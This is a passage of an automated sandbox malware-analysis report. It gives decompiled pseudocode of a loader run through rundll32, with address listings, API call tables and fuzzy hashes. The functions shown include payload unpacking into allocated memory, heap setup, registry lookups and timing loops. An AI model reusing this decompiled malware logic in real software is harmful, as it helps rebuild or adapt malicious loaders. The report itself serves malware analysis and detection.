					if(_t54 != _t63) {
						 *0x408d270 =  *0x408d270 ^ 0x81bbe65d;
						_t32 = E040858BE(0x60);
						 *0x408d324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x408d324; // 0x4c895b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x408d324; // 0x4c895b0
							 *_t51 = 0x408e845;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x408d238, 0, 0x43);
							 *0x408d2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x408d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x408d2a4; // 0xbfa5a8
								_t13 = _t58 + 0x408e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x408c28f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E040893D5( ~_v8 &  *0x408d270, 0x408d00c); // executed
								_t42 = E040898F7(0, _t55, _t63, 0x408d00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E0408205B(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04089B6F(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E04086CD3(__eflags,  &(_t67[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x408d160();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E04087827(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                          0x04084908
                                          0x04084912
                                          0x04084915
                                          0x04084918
                                          0x0408491b
                                          0x04084922
                                          0x04084924
                                          0x04084930
                                          0x04084932
                                          0x04084932
                                          0x0408493b
                                          0x04084941
                                          0x04084946
                                          0x04084960
                                          0x0408496c
                                          0x0408496e
                                          0x04084973
                                          0x0408497d
                                          0x0408497d
                                          0x04084975
                                          0x04084975
                                          0x04084975
                                          0x04084975
                                          0x04084984
                                          0x04084991
                                          0x04084998
                                          0x0408499d
                                          0x0408499d
                                          0x040849a6
                                          0x040849a9
                                          0x040849cf
                                          0x040849db
                                          0x040849e0
                                          0x040849e5
                                          0x040849e7
                                          0x04084a13
                                          0x04084a15
                                          0x040849e9
                                          0x040849ed
                                          0x040849f2
                                          0x040849f7
                                          0x040849fe
                                          0x04084a04
                                          0x04084a09
                                          0x04084a0f
                                          0x04084a16
                                          0x04084a18
                                          0x04084a1a
                                          0x04084a29
                                          0x04084a2f
                                          0x04084a34
                                          0x04084a36
                                          0x04084a66
                                          0x04084a68
                                          0x04084a38
                                          0x04084a38
                                          0x04084a3e
                                          0x04084a4b
                                          0x04084a51
                                          0x04084a51
                                          0x04084a59
                                          0x04084a62
                                          0x04084a69
                                          0x04084a6b
                                          0x04084a6d
                                          0x04084a74
                                          0x04084a81
                                          0x04084a86
                                          0x04084a8b
                                          0x04084a8d
                                          0x04084a8f
                                          0x00000000
                                          0x00000000
                                          0x04084a91
                                          0x04084a96
                                          0x04084a98
                                          0x04084a9f
                                          0x04084aa3
                                          0x04084aa6
                                          0x04084abb
                                          0x04084abf
                                          0x04084ac4
                                          0x00000000
                                          0x04084ac4
                                          0x04084aa8
                                          0x04084aaa
                                          0x00000000
                                          0x00000000
                                          0x04084ab0
                                          0x04084ab5
                                          0x04084ab7
                                          0x04084ab9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04084ab9
                                          0x04084a9c
                                          0x04084a9c
                                          0x04084a6d
                                          0x040849ab
                                          0x040849ab
                                          0x040849b0
                                          0x04084ac6
                                          0x04084acb
                                          0x04084ad3
                                          0x04084ad3
                                          0x00000000
                                          0x04084acb
                                          0x040849b6
                                          0x040849b9
                                          0x040849c3
                                          0x040849ca
                                          0x00000000
                                          0x04084adb
                                          0x04084adb
                                          0x04084ade
                                          0x04084ae2
                                          0x04084ae2

                                          APIs
                                            • Part of subcall function 040811AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,04084920,00000001), ref: 040811BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 0408499D
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • memset.NTDLL ref: 040849ED
                                          • RtlInitializeCriticalSection.NTDLL(04C89570), ref: 040849FE
                                            • Part of subcall function 04086CD3: memset.NTDLL ref: 04086CED
                                            • Part of subcall function 04086CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04086D24
                                            • Part of subcall function 04086CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04084AB5), ref: 04086D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04084A29
                                          • wsprintfA.USER32 ref: 04084A59
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 965ba60bb1bc1ca55947a206b221e8ee956f8d055dd2a1358dd811ba3607b648
                                          • Instruction ID: 670bd6185ad9d15aa9677c73929caa49388bfcfb1590b113a55cb31cdcf2cb5a
                                          • Opcode Fuzzy Hash: 965ba60bb1bc1ca55947a206b221e8ee956f8d055dd2a1358dd811ba3607b648
                                          • Instruction Fuzzy Hash: 9E516D71A00216ABEBA1FFA4DB84BAE77E8EF04714F14452DE5C1FA180F67CA9008B55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04086CD3, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E04086CD3(void* __eflags, WCHAR* _a4) {
				char _v40;
				char _v44;
				void _v48;
				int _v52;
				char _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr _v72;
				int _v76;
				WCHAR* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				char _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t81;
				WCHAR* _t90;

				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_v76 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x408d2a4; // 0xbfa5a8
				_t5 = _t40 + 0x408ee24; // 0x410025
				_t90 = E04084814(_t5);
				_v84 = _t90;
				if(_t90 == 0) {
					_t81 = 8;
					L24:
					return _t81;
				}
				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
				if(_t45 != 0) {
					_t81 = 1;
					L22:
					E0408147E(_v88);
					goto L24;
				}
				if(E04089138(0,  &_v96) != 0) {
					_v96 = 0;
				}
				_t50 = E0408A5E9(0,  *0x408d33c);
				_v96 = _t50;
				if(_t50 == 0) {
					_t81 = 8;
					goto L19;
				} else {
					_t52 =  *0x408d2a4; // 0xbfa5a8
					_t11 = _t52 + 0x408e81a; // 0x65696c43
					_t55 = E0408A5E9(0, _t11);
					_t93 = _t55;
					if(_t55 == 0) {
						_t81 = 8;
					} else {
						_t81 = E040874B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
						E0408147E(_t93);
					}
					if(_t81 != 0) {
						L17:
						E0408147E(_v92);
						L19:
						_t92 = _v96;
						if(_v96 != 0) {
							E0408568A(_t92);
						}
						goto L22;
					} else {
						if(( *0x408d260 & 0x00000001) == 0) {
							L14:
							E04086E92(_t81, _v60, _v56,  *0x408d270, 0);
							_t81 = E04086737(_v72,  &_v64,  &_v60, 0);
							if(_t81 == 0) {
								_v68 = _v96;
								_v64 =  &_v60;
								_t81 = E040872F2( &_v84, 0);
							}
							E0408147E(_v60);
							goto L17;
						}
						_t67 =  *0x408d2a4; // 0xbfa5a8
						_t18 = _t67 + 0x408e823; // 0x65696c43
						_t70 = E0408A5E9(0, _t18);
						_t95 = _t70;
						if(_t70 == 0) {
							_t81 = 8;
						} else {
							_t22 =  &_v96; // 0x65696c43
							_t81 = E040874B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
							E0408147E(_t95);
						}
						if(_t81 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}




























                                          0x04086ce9
                                          0x04086ced
                                          0x04086cf4
                                          0x04086cfc
                                          0x04086cfd
                                          0x04086cfe
                                          0x04086cff
                                          0x04086d00
                                          0x04086d01
                                          0x04086d09
                                          0x04086d15
                                          0x04086d17
                                          0x04086d1d
                                          0x04086e86
                                          0x04086e87
                                          0x04086e8f
                                          0x04086e8f
                                          0x04086d2f
                                          0x04086d37
                                          0x04086e78
                                          0x04086e79
                                          0x04086e7d
                                          0x00000000
                                          0x04086e7d
                                          0x04086d4a
                                          0x04086d4c
                                          0x04086d4c
                                          0x04086d58
                                          0x04086d5d
                                          0x04086d63
                                          0x04086e66
                                          0x00000000
                                          0x04086d69
                                          0x04086d69
                                          0x04086d6e
                                          0x04086d77
                                          0x04086d7c
                                          0x04086d85
                                          0x04086dac
                                          0x04086d87
                                          0x04086da1
                                          0x04086da3
                                          0x04086da3
                                          0x04086daf
                                          0x04086e59
                                          0x04086e5d
                                          0x04086e67
                                          0x04086e67
                                          0x04086e6d
                                          0x04086e6f
                                          0x04086e6f
                                          0x00000000
                                          0x04086db5
                                          0x04086dbc
                                          0x04086e01
                                          0x04086e14
                                          0x04086e2d
                                          0x04086e31
                                          0x04086e37
                                          0x04086e3f
                                          0x04086e4e
                                          0x04086e4e
                                          0x04086e54
                                          0x00000000
                                          0x04086e54
                                          0x04086dbe
                                          0x04086dc3
                                          0x04086dcc
                                          0x04086dd1
                                          0x04086dd5
                                          0x04086dfc
                                          0x04086dd7
                                          0x04086de7
                                          0x04086df1
                                          0x04086df3
                                          0x04086df3
                                          0x04086dff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04086dff
                                          0x04086daf

                                          APIs
                                          • memset.NTDLL ref: 04086CED
                                            • Part of subcall function 04084814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04086D15,00410025,00000005,?,00000000), ref: 04084825
                                            • Part of subcall function 04084814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04084842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04086D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04084AB5), ref: 04086D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: c767f2b32db04c4295eecd45b869bc9f40cef0020003e4b86e3e8c9e30622d62
                                          • Instruction ID: d5c625e4d6cba5b4689bb922c348c9368d3aca1c1cb28cdf6508eb287d290e66
                                          • Opcode Fuzzy Hash: c767f2b32db04c4295eecd45b869bc9f40cef0020003e4b86e3e8c9e30622d62
                                          • Instruction Fuzzy Hash: CA416C72604315AFE750BEA0DA84DAFB6ECEF44618F014A3EB9C4F7150D676E9048B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04084FFA, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 04085057
                                          • SysAllocString.OLEAUT32(0408A6F4), ref: 0408509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 040850AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 040850BD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: b943b7d3cf062fff21b351b0a8270451b2d7c90b2ea24e2be4b0b86b1748e936
                                          • Instruction ID: 9648f89d384b3c3bd98c08f5b8d5bed2336c67b16befe589a29285a67ab82d3d
                                          • Opcode Fuzzy Hash: b943b7d3cf062fff21b351b0a8270451b2d7c90b2ea24e2be4b0b86b1748e936
                                          • Instruction Fuzzy Hash: F2311D71910209FFDB04EF98D9848EE7BB9FF48340B10852EF945AB250E735A941CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00511B6F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E00511B6F(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t42;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed int _t61;
				intOrPtr _t78;
				void* _t79;

				_t78 =  *0x514130;
				_t42 = E00511C8A(_t78,  &_v24,  &_v16);
				_v20 = _t42;
				if(_t42 == 0) {
					asm("sbb ebx, ebx");
					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t79 = _t78 + _v24;
					_v40 = _t79;
					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
					_v28 = _t49;
					if(_t49 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t61 <= 0) {
							_t50 =  *0x514140;
						} else {
							_t53 = _t49 - _t79;
							_v32 = _t53;
							_v36 = _t53 + _a4 + 0x5151a2;
							_v12 = _t79;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("rol edx, cl");
								E00511908(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								_v12 = _v12 + 0x1000;
								 *0x514140 = _t50;
								if(_v8 >= _t61) {
									break;
								}
								_t53 = _v32;
							}
						}
						if(_t50 != 0x59935a40) {
							_v20 = 0xc;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}





















                                          0x00511b76
                                          0x00511b86
                                          0x00511b8b
                                          0x00511b90
                                          0x00511ba5
                                          0x00511bac
                                          0x00511bb1
                                          0x00511bc2
                                          0x00511bc5
                                          0x00511bcb
                                          0x00511bd0
                                          0x00511c7a
                                          0x00511bd6
                                          0x00511bd6
                                          0x00511bdc
                                          0x00511c42
                                          0x00511bde
                                          0x00511be1
                                          0x00511beb
                                          0x00511bee
                                          0x00511bf1
                                          0x00511bf9
                                          0x00511c04
                                          0x00511c05
                                          0x00511c06
                                          0x00511c15
                                          0x00511c1e
                                          0x00511c28
                                          0x00511c2b
                                          0x00511c2e
                                          0x00511c35
                                          0x00511c3d
                                          0x00000000
                                          0x00000000
                                          0x00511bf6
                                          0x00511bf6
                                          0x00511c3f
                                          0x00511c4c
                                          0x00511c61
                                          0x00511c4e
                                          0x00511c57
                                          0x00511c5c
                                          0x00511c72
                                          0x00511c72
                                          0x00511c81
                                          0x00511c87

                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00511BC5
                                          • memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,005111FF,-00000008), ref: 00511C57
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00511C72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFreememcpy
                                          • String ID: Dec 1 2020
                                          • API String ID: 4010158826-3539646581
                                          • Opcode ID: 7129d11a78c38e1452a2de3fe83317c7060fe88794d89786f6bb56db393b701b
                                          • Instruction ID: 56461d3266ce0a35915410e31b55bee56868a466ade99ab1556a601bafdd5ae4
                                          • Opcode Fuzzy Hash: 7129d11a78c38e1452a2de3fe83317c7060fe88794d89786f6bb56db393b701b
                                          • Instruction Fuzzy Hash: 4C316D71D4061AEBEB01DF98D885BEEBBB5BF58304F108165EA01BB240D770AE45DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04081295, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E04081295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E040858BE(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                          0x040812a1
                                          0x040812a5
                                          0x040812a6
                                          0x040812a7
                                          0x040812a9
                                          0x040812ab
                                          0x040812ae
                                          0x040812b3
                                          0x0408134a
                                          0x04081351
                                          0x04081351
                                          0x040812bc
                                          0x040812c3
                                          0x040812d3
                                          0x040812d3
                                          0x040812d9
                                          0x040812db
                                          0x040812e0
                                          0x040812e9
                                          0x040812ef
                                          0x040812f4
                                          0x040812ff
                                          0x04081303
                                          0x04081305
                                          0x04081306
                                          0x0408130f
                                          0x04081313
                                          0x04081324
                                          0x04081315
                                          0x0408131a
                                          0x0408131f
                                          0x0408132e
                                          0x0408132e
                                          0x04081303
                                          0x04081334
                                          0x0408133a
                                          0x0408133a
                                          0x04081343
                                          0x04081348
                                          0x04081348
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: a72d89e7bfcfa03d4250a7094b37400d50f57667f57e8547fae7a72a8f4a2a11
                                          • Instruction ID: 3e396766a4c065a1603aec1f3685b357c1dd2dadf5657b9ace3212bbfa819bad
                                          • Opcode Fuzzy Hash: a72d89e7bfcfa03d4250a7094b37400d50f57667f57e8547fae7a72a8f4a2a11
                                          • Instruction Fuzzy Hash: AF212F75901209EFDB11EFA4DA849DEBBF8FF48345B10416DE981BB200E734EA41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040890A1, Relevance: 6.0, APIs: 4, Instructions: 38sleepmemorythreadCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E040890A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _t5;
				void* _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				signed int _t16;
				signed int _t22;

				_t16 = __edx;
				_t5 = HeapCreate(0, 0x400000, 0); // executed
				 *0x408d238 = _t5;
				if(_t5 == 0) {
					_t14 = 8;
					return _t14;
				}
				 *0x408d1a8 = GetTickCount();
				_t7 = E04086A7F(_a4);
				if(_t7 == 0) {
					do {
						_t22 = SwitchToThread() + 8;
						_t10 = E04081C04(_a4, _t22);
						Sleep(0x20 + _t22 * 4); // executed
					} while (_t10 == 1);
					if(E04089511(_t15) != 0) {
						 *0x408d260 = 1; // executed
					}
					_t13 = E04084908(_t16); // executed
					return _t13;
				}
				return _t7;
			}











                                          0x040890a1
                                          0x040890aa
                                          0x040890b0
                                          0x040890b7
                                          0x040890bb
                                          0x00000000
                                          0x040890bb
                                          0x040890c8
                                          0x040890cd
                                          0x040890d4
                                          0x040890d8
                                          0x040890e4
                                          0x040890e8
                                          0x040890f7
                                          0x040890fd
                                          0x0408910b
                                          0x0408910d
                                          0x0408910d
                                          0x04089117
                                          0x00000000
                                          0x04089117
                                          0x0408911c

                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04086F11,?), ref: 040890AA
                                          • GetTickCount.KERNEL32 ref: 040890BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 040890D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 040890F7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: 6872b9a9d6ee88789ad591a18710c19e45b07b9c1fb80960f7fd8a6d3367c03c
                                          • Instruction ID: 71afd3d466df16756642b9b0955f72158eafbd387f422a17ac73ee992df804cc
                                          • Opcode Fuzzy Hash: 6872b9a9d6ee88789ad591a18710c19e45b07b9c1fb80960f7fd8a6d3367c03c
                                          • Instruction Fuzzy Hash: BCF0A471604200AAFB117F74AF0CBAA36E4AF54359F10003DE9C4F6240E73CE8008A61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040868CF, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E040868CF() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E04089138(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x408d2a4; // 0xbfa5a8
				_t4 = _t24 + 0x408ede0; // 0x4c89388
				_t5 = _t24 + 0x408ed88; // 0x4f0053
				_t26 = E04081B13( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x408d2a4; // 0xbfa5a8
						_t11 = _t32 + 0x408edd4; // 0x4c8937c
						_t48 = _t11;
						_t12 = _t32 + 0x408ed88; // 0x4f0053
						_t51 = E04085FCB(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0x408d2a4; // 0xbfa5a8
							_t13 = _t35 + 0x408ea59; // 0x30314549
							if(E040875E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0x408d25c - 6;
								if( *0x408d25c <= 6) {
									_t42 =  *0x408d2a4; // 0xbfa5a8
									_t15 = _t42 + 0x408ec3a; // 0x52384549
									E040875E7(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0x408d2a4; // 0xbfa5a8
							_t17 = _t38 + 0x408ee18; // 0x4c893c0
							_t18 = _t38 + 0x408edf0; // 0x680043
							_t45 = E04081BC1(_v8, 0x80000001, _t51, _t18, _t17);
							HeapFree( *0x408d238, 0, _t51);
						}
					}
					HeapFree( *0x408d238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E0408568A(_t53);
				}
				return _t45;
			}

















                                          0x040868df
                                          0x040868e2
                                          0x040868e9
                                          0x040868eb
                                          0x040868eb
                                          0x040868ee
                                          0x040868f3
                                          0x040868fa
                                          0x04086907
                                          0x0408690c
                                          0x04086910
                                          0x0408691e
                                          0x0408692c
                                          0x04086930
                                          0x040869c1
                                          0x040869c1
                                          0x04086936
                                          0x04086936
                                          0x0408693b
                                          0x0408693b
                                          0x04086942
                                          0x0408694e
                                          0x04086950
                                          0x04086952
                                          0x04086954
                                          0x0408695b
                                          0x0408696d
                                          0x0408696f
                                          0x04086976
                                          0x04086978
                                          0x0408697f
                                          0x0408698a
                                          0x0408698a
                                          0x04086976
                                          0x0408698f
                                          0x04086994
                                          0x0408699b
                                          0x040869b9
                                          0x040869bb
                                          0x040869bb
                                          0x04086952
                                          0x040869cd
                                          0x040869cd
                                          0x040869cf
                                          0x040869d4
                                          0x040869d6
                                          0x040869d6
                                          0x040869e1

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04C89388,00000000,?,7519F710,00000000,7519F730), ref: 0408691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04C893C0,?,00000000,30314549,00000014,004F0053,04C8937C), ref: 040869BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04089C10), ref: 040869CD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
